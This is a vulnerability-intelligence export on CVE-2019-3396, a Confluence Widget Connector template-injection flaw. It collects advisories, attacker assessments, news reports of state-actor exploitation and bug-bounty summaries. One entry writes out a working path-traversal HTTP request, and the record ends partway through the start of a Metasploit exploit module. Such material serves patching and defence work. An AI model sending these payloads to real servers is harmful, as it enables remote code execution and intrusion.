{"id": "AKB:D432D14A-94A1-4099-B6F6-959B6EF2A545", "type": "attackerkb", "bulletinFamily": "info", "title": "Confluence Unauthorized RCE Vulnerability", "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 03, 2020 3:30pm UTC reported:\n\nDue to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.\n\nThere is a public POC available:<https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.\n\n**space-r7** at May 22, 2019 1:34pm UTC reported:\n\nDue to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.\n\nThere is a public POC available:<https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4**asoto-r7** at May 09, 2019 5:57pm UTC reported:\n\nDue to many enterprise environments using Confluence, and many of them exposing it to the internet, this vulnerability is incredibly useful.\n\nThere is a public POC available:<https://github.com/Yt1g3r/CVE-2019-3396_EXP> from which you could base other attacks.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4\n", "published": "2019-03-25T00:00:00", "modified": "2020-03-03T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://attackerkb.com/topics/2uHJW7vbky/confluence-unauthorized-rce-vulnerability", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396", "https://www.exploit-db.com/exploits/46731", "https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html", "https://packetstormsecurity.com/files/152568/Atlassian-Confluence-Widget-Connector-Macro-Velocity-Template-Injection.html"], "cvelist": ["CVE-2019-3396"], "lastseen": "2020-11-18T06:36:12", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA"]}, {"type": "cve", "idList": ["CVE-2019-3396"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-57974", "ATLASSIAN:CONFSERVER-57971"]}, {"type": "dsquare", "idList": ["E-686"]}, {"type": "hackerone", "idList": ["H1:538771", "H1:536130", "H1:518637", "H1:541858"]}, {"type": "canvas", "idList": ["CONFLUENCE_MACRO_LFI"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "TRENDMICROBLOG:0EF9DC5097F65BD1DE3DF56D0170F328"]}, {"type": "fireeye", "idList": ["FIREEYE:B394E05FC4834992E8F05135E3087CAD", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "zdt", "idList": ["1337DAY-ID-32569"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/CONFLUENCE_WIDGET_CONNECTOR"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152568"]}, {"type": "threatpost", "idList": ["THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452"]}, {"type": "nessus", "idList": ["CONFLUENCE_6_6_12.NASL", "CONFLUENCE_CVE-2019-3396.NASL"]}, {"type": "securelist", "idList": ["SECURELIST:9C375DB331E2434EE824100A45629096"]}, {"type": "exploitdb", "idList": ["EDB-ID:46731"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}], "modified": "2020-11-18T06:36:12", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2020-11-18T06:36:12", "rev": 2}, "vulnersScore": 6.0}, "attackerkb": {"attackerValue": 4, "exploitability": 4}, "wildExploited": false}

{"attackerkb": [{"lastseen": "2020-11-18T06:36:34", "bulletinFamily": "info", "cvelist": ["CVE-2019-3396"], "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:54pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n", "modified": "2019-10-30T00:00:00", "published": "2019-10-30T00:00:00", "id": "AKB:BFDD9A54-15E2-4C3F-A140-DA45C72DACDA", "href": "https://attackerkb.com/topics/8PZOMRtIAA/cve-2019-3396", "type": "attackerkb", "title": "CVE-2019-3396", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T21:41:52", "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-25T19:29:00", "title": "CVE-2019-3396", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2019-04-22T16:10:00", "cpe": [], "id": "CVE-2019-3396", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-3396", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}], "atlassian": [{"lastseen": "2020-12-24T14:35:22", "bulletinFamily": "software", "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "description": "There was a server-side template injection vulnerability in Confluence Server and Data Center, in the Widget Connector. An attacker is able to exploit this issue to achieve path traversal and remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.\r\n\r\n\u00a0\r\n\r\n*Affected versions:*\r\n\r\nAll versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x) and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x).\r\n\r\n\u00a0\r\n\r\n*Fix:*\r\n * Confluence Server version 6.15.1 is available for download from [https://www.atlassian.com/software/confluence/download].\r\n * Confluence Server version 6.14.2 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n * Confluence Server version 6.13.3 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n * Confluence Server version 6.12.3 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n * Confluence Server version 6.6.12 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the full advisory: [https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2019-03-20]\r\n\r\n\u00a0", "edition": 32, "modified": "2020-05-22T08:24:06", "published": "2019-02-28T03:02:04", "id": "ATLASSIAN:CONFSERVER-57974", "href": "https://jira.atlassian.com/browse/CONFSERVER-57974", "title": "Remote code execution via Widget Connector macro - CVE-2019-3396", "type": "atlassian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T14:35:27", "bulletinFamily": "software", "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "description": "There was an SSRF vulnerability in Confluence Server and Data Center in the WebDAV plugin. A remote attacker is able to exploit this issue to send arbitrary HTTP and WebDAV requests from a Confluence Server instance.\r\n\r\n\u00a0\r\n\r\n*Affected versions:*\r\n * All versions of Confluence Server and Confluence Data Center before version 6.6.7, from version 6.7.0 before 6.8.5 (the fixed version for 6.8.x), from version 6.9.0 before 6.9.3 (the fixed version for 6.9.x).\r\n\r\n\u00a0\r\n\r\n*Fix:*\r\n * Confluence Server version 6.15.1 is available for download from [https://www.atlassian.com/software/confluence/download].\r\n * Confluence Server version 6.14.2 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n * Confluence Server version 6.13.3 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n * Confluence Server version 6.12.3 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n * Confluence Server version 6.6.12 is available for download from [https://www.atlassian.com/software/confluence/download-archives].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the full advisory: [https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2019-03-20]\r\n\r\n\u00a0", "edition": 15, "modified": "2020-05-22T08:25:56", "published": "2019-02-27T22:52:13", "id": "ATLASSIAN:CONFSERVER-57971", "href": "https://jira.atlassian.com/browse/CONFSERVER-57971", "title": "SSRF via WebDAV endpoint - CVE-2019-3395", "type": "atlassian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-10-14T22:22:13", "bulletinFamily": "info", "cvelist": ["CVE-2019-3396"], "description": "The North Korea-linked APT known as Lazarus Group has debuted an advanced, multipurpose malware framework, called MATA, to target Windows, Linux and macOS operating systems.\n\nKaspersky researchers uncovered a series of attacks utilizing MATA (so-called because the malware authors themselves call their infrastructure MataNet), involving the infiltration of corporate entities around the world in a quest to steal customer databases and distribute ransomware. The framework consists of several components, such as a loader, an orchestrator (which manages and coordinates the processes once a device is infected) and plugins. And according to artifacts in the code, Lazarus has been using it since spring 2018.\n\n\u201cMalicious toolsets used to target multiple platforms are a rare breed, as they require significant investment from the developer,\u201d explained Kaspersky analysts, in a report issued on Wednesday. \u201cThey are often deployed for long-term use, which results in increased profit for the actor through numerous attacks spread over time. In the cases discovered by Kaspersky, the MATA framework was able to target three platforms \u2013 Windows, Linux and macOS \u2013 indicating that the attackers planned to use it for multiple purposes.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs far as victimology, known organizations hit by the MATA framework have been located in Germany, India, Japan, Korea, Turkey and Poland \u2014 indicating that the attacks cast a wide net. Moreover, those victims are in various sectors, and include a software development company, an e-commerce company and an internet service provider.\n\n\u201cFrom one victim, we identified one of their intentions,\u201d according to Kaspersky. \u201cAfter deploying MATA malware and its plugins, the actor attempted to find the victim\u2019s databases and execute several database queries to acquire customer lists. We\u2019re not sure if they completed the exfiltration of the customer database, but it\u2019s certain that customer databases from victims are one of their interests. In addition, MATA was used to distribute VHD ransomware to one victim.\u201d\n\n## **Windows Version**\n\nThe Windows version of MATA consists of several components, according to the firm: Most notably, a loader malware, which is used to load an encrypted next-stage payload; and the payload itself, which is likely the orchestrator malware.\n\n\u201cWe\u2019re not sure that the loaded payload is the orchestrator malware, but almost all victims have the loader and orchestrator on the same machine,\u201d the researchers explained.\n\nThe orchestrator loads encrypted configuration data from a registry key and decrypts it with the AES algorithm. It\u2019s purpose is to load various plugins \u2013 up to 15 of them. The perform various functions, including sending the command-and-control (C2) information about the infected host, such as victim ID, internal version number, Windows version, computer name, user name, IP address and MAC address; creating a HTTP proxy server; executing code; manipulating files; and more.\n\nThe parent process that executes the loader malware is the WMI Provider Host process, which usually means the actor has executed malware from a remote host to move laterally, according to Kaspersky \u2013 meaning that additional hosts in the same network could also be infected.\n\n## **Non-Windows versions of MATA**\n\nA Linux version of the MATA orchestrator was seen in December, [uncovered by Netlab](<https://blog.netlab.360.com/dacls-the-dual-platform-rat-en/>) and dubbed DACLs. It was characterized as a remote access trojan (RAT), bundled together with a set of plugins. Kaspersky has linked DACLs to MATA, with the Linux MATA version including both a Windows and a Linux orchestrator, a Linux tool for listing folders, scripts for exploiting Atlassian Confluence Server ([CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>)) and a legitimate [socat tool](<http://www.dest-unreach.org/socat/>).\n\nNote that the Linux version of MATA has a logsend plugin. This plugin implements an interesting new feature, a \u201cscan\u201d command that tries to establish a TCP connection on ports 8291 (used for administration of MikroTik RouterOS devices) and 8292 (\u201cBloomberg Professional\u201d software) and random IP addresses excluding addresses belonging to private networks. Any successful connection is logged and sent to the C2. These logs might be used by attackers for target selection.\n\nThe macOS version of the orchestrator meanwhile was found in April, having been ported from the Linux version. It [was found hiding](<https://threatpost.com/lazarus-macos-spyware-2fa-application/155532/>) in a trojanized macOS application based on an open-source two-factor authentication application named MinaOTP. Its plugin list is almost identical to the Linux version, except that it also contains a plugin named \u201cplugin_socks,\u201d responsible for configuring proxy servers.\n\n## **Links to Lazarus**\n\nLazarus Group, a.k.a. Hidden Cobra or APT 38, has been around since 2009. The APT has been linked to the highly destructive [WannaCry](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) attack that caused millions of dollars of economic damage in 2017, the [SWIFT banking attacks](<https://threatpost.com/bangladesh-bank-hackers-accessed-swift-system-to-steal-cover-tracks/117637/>), as well as the high-profile attack against [Sony Pictures Entertainment](<https://threatpost.com/f-b-i-mandiant-investigating-sony-pictures-breach/109645/>) in 2014. It even has [spawned a spinoff group](<https://threatpost.com/lazarus-apt-spinoff-linked-to-banking-hacks/124746/>), the entire mission of which is to steal money from banks to fund Lazarus\u2019 cybercriminal operations and the North Korean regime as a whole.\n\nLazarus is also constantly evolving: In December, it was seen hooking up with Trickbot operators, which run [a powerful trojan](<https://threatpost.com/trickbot-malware-now-targets-us-banks/126976/>) that targets U.S. banks and others. In May, it was seen [adding macOS spyware](<https://threatpost.com/lazarus-macos-spyware-2fa-application/155532/>) to a two-factor authentication app; and earlier in July, it added [Magecart card-skimming code](<https://threatpost.com/lazarus-group-adds-magecart/157167/>) to its toolbag.\n\nKaspersky has linked the MATA framework to the Lazarus APT group through two unique file names found in the orchestrators: c_2910.cls and k_3872.cls, which have only previously been seen in several variants of the Manuscrypt malware, a known Lazarus tool. Previous research by Netlab also determined the connection between the Linux orchestrator/DACLS RAT and the APT.\n\n\u201cMoreover, MATA uses global configuration data including a randomly generated session ID, date-based version information, a sleep interval and multiple C2s and C2 server addresses,\u201d added the researchers. \u201cWe\u2019ve seen that one of the Manuscrypt variants (ab09f6a249ca88d1a036eee7a02cdd16) shares a similar configuration structure with the MATA framework. This old Manuscrypt variant is an active backdoor that has similar configuration data such as session ID, sleep interval, number of C2 addresses, infected date, and C2 addresses. They are not identical, but they have a similar structure.\u201d\n", "modified": "2020-07-22T16:43:44", "published": "2020-07-22T16:43:44", "id": "THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "href": "https://threatpost.com/lazarus-group-advanced-malware-framework/157636/", "type": "threatpost", "title": "Lazarus Group Surfaces with Advanced Malware Framework", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T15:51:14", "bulletinFamily": "info", "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. \u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "modified": "2020-10-21T20:31:17", "published": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2019-07-31T14:53:54", "bulletinFamily": "bugbounty", "bounty": 2000.0, "cvelist": ["CVE-2019-3396"], "description": "Unpatched CVE-2019-3396 (and few more) in publicly accessible Atlassian Confluence instance in ESForce domain.", "modified": "2019-07-08T15:24:57", "published": "2019-04-11T20:10:37", "id": "H1:536130", "href": "https://hackerone.com/reports/536130", "type": "hackerone", "title": "Mail.ru: Path traversal, SSTI and RCE on a MailRu acquisition ", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-02T16:29:58", "bulletinFamily": "bugbounty", "bounty": 10000.0, "cvelist": ["CVE-2019-3396"], "description": "Confluence widget connector vulnerable to CVE-2019-3396 was available on shared.mail.ru", "modified": "2019-12-02T15:22:35", "published": "2019-03-29T10:45:58", "id": "H1:518637", "href": "https://hackerone.com/reports/518637", "type": "hackerone", "title": "Mail.ru: RCE on shared.mail.ru due to \"widget\" plugin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-05T10:55:11", "bulletinFamily": "bugbounty", "bounty": 750.0, "cvelist": ["CVE-2019-3396"], "description": "Unpatched CVE-2019-3396 in geekbrains.ru", "modified": "2020-10-05T09:43:47", "published": "2019-04-18T08:32:11", "id": "H1:541858", "href": "https://hackerone.com/reports/541858", "type": "hackerone", "title": "Mail.ru: [geekbrains.ru] CVE-2019-5418 Ruby on Rails File Content Disclosure", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-04T15:31:46", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": [], "description": "#POC\n\n```\nPOST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\nContent-Type: application/json\nContent-Length: 174\n\n{\"contentId\":\"12345\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.youtube.com/watch?v=wHEHYJpCkpg\",\"width\":\"300\",\"height\":\"200\",\"_template\":\"file://../\"}}}\n```\n\nThanks,\nBen\n\n## Impact\n\n#", "modified": "2019-10-04T15:17:21", "published": "2019-04-15T19:06:19", "id": "H1:538771", "href": "https://hackerone.com/reports/538771", "type": "hackerone", "title": "U.S. Dept Of Defense: LFI with potential to RCE on \u2588\u2588\u2588\u2588\u2588\u2588 using CVE-2019-3396", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2019-04-19T03:48:41", "description": "", "published": "2019-04-18T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Widget Connector Macro Velocity Template Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2019-04-18T00:00:00", "id": "PACKETSTORM:152568", "href": "https://packetstormsecurity.com/files/152568/Atlassian-Confluence-Widget-Connector-Macro-Velocity-Template-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::FtpServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\", \n'Description' => %q{ \nWidget Connector Macro is part of Atlassian Confluence Server and Data Center that \nallows embed online videos, slideshows, photostreams and more directly into page. \nA _template parameter can be used to inject remote Java code into a Velocity template, \nand gain code execution. Authentication is unrequired to exploit this vulnerability. \nBy default, Java payload will be used because it is cross-platform, but you can also \nspecify which native payload you want (Linux or Windows). \n \nConfluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version \n6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. \n \nThis vulnerability was originally discovered by Daniil Dmitriev \nhttps://twitter.com/ddv_ua. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Daniil Dmitriev', # Discovering vulnerability \n'Dmitry (rrock) Shchannikov' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2019-3396' ], \n[ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ], \n[ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-\u3010CVE-2019-3396\u3011-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'], \n[ 'URL', 'https://paper.seebug.org/886/'] \n], \n'Targets' => \n[ \n[ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }], \n[ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }], \n[ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }] \n], 